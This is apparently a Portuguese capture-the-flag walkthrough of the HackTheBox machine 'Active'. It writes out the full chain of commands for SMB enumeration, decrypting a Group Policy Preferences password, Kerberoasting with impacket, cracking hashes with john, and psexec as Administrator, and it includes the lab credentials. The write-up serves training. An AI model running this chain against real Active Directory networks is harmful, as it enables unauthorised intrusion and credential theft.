Skip to content

Active

Referencia em video

Temas envolvidos:

Enumeração DNS
Enumeração de usuários Kerberos kerbrute
Groups.xml
AsRep Roasting
Kerberoasting

Enumeration

Bora começar com a enumeração básica da máquina.

sudo nmap_enum active.htb | tee nmap_output.txt

O script acima pode ser encontrado em nmap_enum

Esse script é um resumo de enumeração com base na metodologia empregada na OSCP.

Até aqui sossegado, sem novidade:

Vamos enumerar o serviço SMB:

smbclient -L //10.10.10.100
smbclient //10.10.10.100/Replication -c 'recurse true; ls'

qownnotes-media-vtsXyC

Aqui já encontramos um vetor de ataque interessante.

smbclient //10.10.10.100/Replication
cd active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups
get Groups.xml

Referência

Exploitation

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

A ferramenta acima pode ser encontrada: aqui

qownnotes-media-jysviZ

Depois de fazer algumas tentativas de acesso via winrm, wmiexec e afins, consegui fazer um ataque conhecido como As-Rep Roasting

impacket-psexec active.htb/SVC_TGS:GPPstillStandingStrong2k18@10.10.10.100

impacket-GetNPUsers active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

Privilege Escalation

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

qownnotes-media-tKQdxa

qownnotes-media-qApPLP

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

impacket-psexec 'active.htb/Administrator:Ticketmaster1968@10.10.10.100'

qownnotes-media-LCzGOy